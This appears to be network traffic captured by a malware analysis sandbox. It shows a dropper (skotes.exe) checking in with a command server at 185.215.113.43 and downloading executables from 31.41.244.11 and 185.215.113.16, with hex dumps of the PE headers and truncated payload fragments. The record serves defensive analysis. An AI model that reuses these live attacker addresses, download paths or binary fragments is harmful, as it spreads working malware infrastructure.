Dec 15, 2024 00:04:09.326999903 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:04:09.736680031 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68736 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:05:06.721879959 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:05:07.038269997 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68793 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:05:59.706573963 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:06:00.114044905 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68846 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49976	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:11.368117094 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015356001&unit=246122658369
Dec 14, 2024 23:59:12.699235916 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49983	31.41.244.11	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:12.835253954 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 23:59:14.165081024 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:13 GMT Content-Type: application/octet-stream Content-Length: 727552 Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P\|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
Dec 14, 2024 23:59:14.165142059 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:14.165153980 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:14.165445089 CET	1236	IN	Data Raw: 44 00 00 90 69 04 be 95 e9 d1 5b 89 c1 c1 e9 18 31 c1 69 c1 95 e9 d1 5b 69 ca 95 e9 d1 5b 31 c1 69 44 be 04 95 e9 d1 5b 89 c2 c1 ea 18 31 c2 69 c2 95 e9 d1 5b 69 d1 95 e9 d1 5b 31 c2 83 c7 02 39 fb 75 bf f6 45 e0 04 74 1d 90 69 3c be 95 e9 d1 5b Data Ascii: Di[1i[i[1iD[1i[i[19uEti<[1i[i[1E1ttu#\|D11i[11i[1;uu$U}D$MJLEEEr2P
Dec 14, 2024 23:59:14.165460110 CET	1236	IN	Data Raw: 9f 41 00 e8 57 00 00 00 83 c4 08 90 8b 45 c4 8d 4d c4 6a 01 ff 10 90 c7 45 c4 44 60 41 00 8d 45 c8 50 e8 06 2f 00 00 83 c4 04 b8 07 16 40 00 83 c4 0c 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 0c 83 c5 0c 90 c7 45 c4 44 60 41 00 8d 45 c8 50 Data Ascii: AWEMjED`AEP/@]ff.UED`AEP.]SWV\|$A1D$\$$j93SjWVp0;L$1^_[UWVu}A1Ehmd5XAEUj
Dec 14, 2024 23:59:14.165476084 CET	672	IN	Data Raw: 00 eb 13 90 ff 75 e0 e8 88 08 00 00 83 c4 04 56 ff 15 48 cc 41 00 90 8b 45 e8 64 a3 00 00 00 00 b0 01 83 c4 4c 5e 5f 5b 5d c3 90 c7 45 f0 03 00 00 00 e8 64 05 00 00 e8 c5 64 00 00 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 1c 83 c5 0c Data Ascii: uVHAEdL^_[]Eddffffff.Uu9]Uu]U]@U]@UMa]fff.U]@U]D$t
Dec 14, 2024 23:59:14.166209936 CET	1236	IN	Data Raw: 68 d0 20 40 00 6a 00 6a 00 e8 cc 51 00 00 83 c4 18 90 8b 4d e0 89 01 85 c0 0f 84 fd 00 00 00 90 c7 45 d8 00 00 00 00 90 8b 45 d4 8b 30 85 f6 0f 84 fb 00 00 00 e8 65 10 00 00 39 c6 0f 84 fd 00 00 00 90 6a 00 8b 75 e0 ff 76 04 ff 36 e8 fe 0f 00 00 Data Ascii: h @jjQMEE0e9juv6FuAEj@@EMEQjPh"@jj-QEEu9juue
Dec 14, 2024 23:59:14.166244984 CET	1236	IN	Data Raw: e8 dc 00 00 00 83 c4 04 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc b8 28 d4 41 00 e9 9d 1f 00 00 cc cc cc cc cc cc b8 a8 d4 41 00 e9 8d 1f 00 00 cc cc cc cc cc cc b8 08 d5 41 00 e9 7d 1f 00 00 cc cc cc cc cc cc b8 64 d5 41 00 e9 6d 1f 00 00 cc Data Ascii: ](AAA}dAmA]tAMA=A-<AhAUugQYtuaYt]}gaUuY]
Dec 14, 2024 23:59:14.166277885 CET	448	IN	Data Raw: 0c 56 e8 0b fc ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 14 56 8b 75 08 ff 34 b5 7c 61 41 00 e8 1f 00 00 00 50 ff 34 b5 98 61 41 00 8d 4d ec e8 02 02 00 00 68 2c d7 41 00 8d 45 ec 50 e8 8d 17 00 00 cc b8 44 e6 41 00 c3 55 8b ec 8b 45 08 8b Data Ascii: VYY^]UVu4\|aAP4aAMh,AEPDAUEUH]UQQVWuupEPAPTYY_^UAVuV;Bu;Eu2^]UQVWy1urAE_^UUVuBN@;Au
Dec 14, 2024 23:59:14.166578054 CET	1236	IN	Data Raw: 08 8b c6 8b 55 0c 89 4e 0c 8b 4d fc c7 06 c4 61 41 00 33 cd 89 56 10 5e e8 74 fa ff ff c9 c2 0c 00 55 8b ec 56 8b 75 08 57 56 8b f9 e8 a3 fa ff ff c7 07 c4 61 41 00 8b 46 0c 8b 56 10 89 47 0c 8b c7 89 57 10 5f 5e 5d c2 04 00 55 8b ec 56 8b f1 8d Data Ascii: UNMaA3V^tUVuWVaAFVGW_^]UVFD`APEYtjVYY^]j [AuEMPueEPuuMaAUVuNaA^],AUQuY
Dec 14, 2024 23:59:14.286062956 CET	1236	IN	Data Raw: 2c ff ff ff 7f 75 0a c7 41 2c fe ff ff 7f 32 c0 c3 b0 01 c3 55 8b ec 51 56 6a 00 6a ff ff 75 08 ff 15 6c cd 41 00 83 f8 ff 74 32 8b 75 10 85 f6 74 16 8d 45 fc 50 ff 75 08 ff 15 b4 cc 41 00 85 c0 74 1a 8b 45 fc 89 06 ff 75 08 ff 15 48 cc 41 00 f7 Data Ascii: ,uA,2UQVjjulAt2utEPuAtEuHAjX^%AUMhAEPU$jAtjY)AAAA5A=AfAfAfAfAf%Af-AA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49994	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:18.451399088 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015357001&unit=246122658369
Dec 14, 2024 23:59:19.812129974 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50000	31.41.244.11	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:19.941319942 CET	61	OUT	GET /files/encoxx/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 23:59:21.266343117 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:21 GMT Content-Type: application/octet-stream Content-Length: 393728 Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT Connection: keep-alive ETag: "675a96d4-60200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
Dec 14, 2024 23:59:21.266380072 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05 Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvlll
Dec 14, 2024 23:59:21.266416073 CET	1236	IN	Data Raw: 6c 05 00 bc 6c 05 00 cc 6c 05 00 e2 6c 05 00 f6 6c 05 00 78 6b 05 00 5c 69 05 00 90 71 05 00 80 6d 05 00 9c 6d 05 00 ba 6d 05 00 cc 6d 05 00 d8 6d 05 00 f0 6d 05 00 08 6e 05 00 1a 6e 05 00 2a 6e 05 00 38 6e 05 00 4a 6e 05 00 62 6e 05 00 76 6e 05 Data Ascii: lllllxk\iqmmmmmmnnn8nJnbnvnnnnnnnnnoo8oJoXodonoooooooopp&p2p<pHpZpppppppppqqq<q
Dec 14, 2024 23:59:21.266447067 CET	224	IN	Data Raw: 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e Data Ascii: ndicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR
Dec 14, 2024 23:59:21.266586065 CET	1236	IN	Data Raw: 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 5f 6f 6e 65 78 69 74 2f 61 74 65 78 69 Data Ascii: 6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough
Dec 14, 2024 23:59:21.266848087 CET	1236	IN	Data Raw: 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 40 e6 45 00 98 e6 45 Data Ascii: InformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLL@EEe+000~PAGAIsProcessorFeaturePresentKERNEL32_nextafter_logb_yn_y1_y0frexpfmod_hypot_cabsldexpmodffabs
Dec 14, 2024 23:59:21.266901016 CET	1236	IN	Data Raw: 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 01 81 01 81 01 81 01 81 01 81 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 Data Ascii: H
Dec 14, 2024 23:59:21.266933918 CET	672	IN	Data Raw: 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 Data Ascii: MDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTue
Dec 14, 2024 23:59:21.267602921 CET	1236	IN	Data Raw: 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f Data Ascii: tor'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RTTI
Dec 14, 2024 23:59:21.267632008 CET	224	IN	Data Raw: 2a 40 00 4c 2a 40 00 40 2a 40 00 34 2a 40 00 2c 2a 40 00 20 2a 40 00 08 2a 40 00 fc 29 40 00 e8 29 40 00 c8 29 40 00 a8 29 40 00 88 29 40 00 68 29 40 00 48 29 40 00 24 29 40 00 08 29 40 00 e4 28 40 00 c4 28 40 00 9c 28 40 00 80 28 40 00 70 28 40 Data Ascii: @L@@@4@,@ @*@)@)@)@)@)@h)@H)@$)@)@(@(@(@(@p(@l(@d(@T(@0(@((@(@(@'@'@'@'@X'@,'@'@&@&@&@p&@T&@@SunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDec
Dec 14, 2024 23:59:21.389060020 CET	1236	IN	Data Raw: 00 00 00 43 4f 4e 4f 55 54 24 00 31 23 51 4e 41 4e 00 00 31 23 49 4e 46 00 00 00 31 23 49 4e 44 00 00 00 31 23 53 4e 41 4e 00 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6c 61 74 69 78 6f 77 61 6d 65 67 6f 6e 6f 6d 61 66 6f 63 75 62 61 67 Data Ascii: CONOUT$1#QNAN1#INF1#IND1#SNANbad allocationlatixowamegonomafocubagebekernel32.dllkernel32.dll00HE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50001	185.215.113.16	80	3300	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:20.312869072 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 14, 2024 23:59:21.639728069 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:21 GMT Content-Type: application/octet-stream Content-Length: 3028480 Last-Modified: Sat, 14 Dec 2024 22:32:15 GMT Connection: keep-alive ETag: "675e076f-2e3600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@2/y.@WkD11 @.rsrcD@.idata @syfpipoa ++@kqlprvhw1.@.taggant01".@
Dec 14, 2024 23:59:21.639861107 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:21.639899015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:21.640429020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:21.640463114 CET	1236	IN	Data Raw: 31 05 86 a7 81 d7 33 71 e0 aa 92 a3 2d 9e 14 50 90 76 fb 62 f7 50 45 55 6f 30 19 0a 72 c4 16 f3 bd 08 21 5e d1 c8 8a e7 74 c3 72 e5 f0 b1 81 4b 21 c0 56 27 25 a2 c5 d3 cf c1 06 77 67 57 16 54 f1 44 62 18 49 83 af 52 7f f7 07 e5 b0 c1 ce 18 80 23 Data Ascii: 13q-PvbPEUo0r!^trK!V'%wgWTDbIR#skDu)l22}6c\|`d]@."u0grID7Mc{WLE'_`or%_tqx[IeDcR1wp uQy
Dec 14, 2024 23:59:21.640496969 CET	1236	IN	Data Raw: e2 04 e0 99 a1 ec c5 a4 79 e8 51 2a 3a 73 90 2e 11 06 0a 3b 80 47 32 af 00 0d 16 33 dd 48 35 e7 00 a6 6e 1f af 68 1b e0 ee ea 39 1c 08 c4 b6 b6 8d 27 96 14 67 f7 0e e6 88 c6 95 dc 72 e0 91 f3 d0 04 1c 17 91 38 4c 45 3d fb 12 3f a1 8b ef 06 eb 31 Data Ascii: yQ:s.;G23H5nh9'gr8LE=?1H[w=@,sj`b8\|GGF~}Zq51`=^TEcK:;?ZUn<x^=P=fzjoZ<:ybEYxQ[7[Bx0uz
Dec 14, 2024 23:59:21.641407967 CET	744	IN	Data Raw: 64 af 3d 8b a8 b9 32 b1 b5 c3 bb 68 7f b1 5e 56 3a 9b 21 47 06 34 57 37 12 9e ed 35 b9 b6 5e ee a3 91 44 fa b4 ab 01 08 b9 e1 11 b6 d2 1c f7 a4 e3 38 30 96 e9 cb 90 1a c0 68 1f e5 53 d4 61 93 e9 a9 7c 82 ff 1c f2 b2 8a 25 7e b5 a9 15 39 b1 45 e4 Data Ascii: d=2h^V:!G4W75^D80hSa\|%~9EII7FBcQajp.O\O{;I8y*)<}Y,!rc63ifu/Kmacw7!_p&tv2ZUb%P?
Dec 14, 2024 23:59:21.641458035 CET	1236	IN	Data Raw: 0a a4 00 d2 29 4a 0b a4 1b 24 d7 b0 6c 95 83 13 a5 d3 3e a8 0d 6f f5 51 15 b3 5e 13 5c 4b 9d d3 13 f3 92 73 d2 05 87 a9 a9 21 f9 7f 24 e6 67 ac 52 83 ef 12 d8 c7 77 44 8e ba a9 9b 36 32 f6 27 a3 c6 5f e9 13 a4 6d 17 8d be e1 3b 3c f0 5e 4d cb 0b Data Ascii: )J$l>oQ^\Ks!$gRwD62'_m;<^MjGQFPz"->8&eV+mK6>a]SMMC~kGVMmkp[nVdPbsD(`oCm1-Kul%tiGn=I`.2=$}l~gI
Dec 14, 2024 23:59:21.641491890 CET	1236	IN	Data Raw: cb 68 a2 c6 14 2d 67 c7 14 7d af 2e 5f fc ff 29 a2 a6 0c ec 93 18 6a 98 95 3d c8 f2 55 11 3b b7 4e a5 d4 02 0d 47 76 32 4e f2 1d e7 dd 25 7a 18 ca d6 cb 90 64 68 c7 c6 8c 1a d0 4c 08 16 05 a0 77 4f ca b4 41 40 aa 46 0e 47 39 a4 6c 07 15 ad 6a 40 Data Ascii: h-g}._)j=U;NGv2N%zdhLwOA@FG9lj@Y{pefT.98t;~F{O)'VQ<j2ylf$OB6(&Tq<&lEI~TOCJ&O'g;-k<
Dec 14, 2024 23:59:21.641525984 CET	1236	IN	Data Raw: 99 c6 77 b7 a4 05 0e a2 c8 34 a8 13 18 04 3e ef d1 61 c5 1b 81 48 c5 7b 00 82 f4 8c fa 45 a4 02 bf 3c 7e 07 cd a8 a3 f0 90 9d ef 6f 56 54 4e 07 82 5e 4e e8 52 bc b8 7a 66 31 cc 4b 7c 8b 6d 8e a9 ca e4 54 8c c8 75 0b a9 72 ef 4a 0d 4a 00 b0 e9 34 Data Ascii: w4>aH{E<~oVTN^NRzf1K\|mTurJJ4bLyz/PI M\|In7Id!ELr_;$%6n@FKkK$)R'aus_nb?<5/+@I_sh&B1Af12
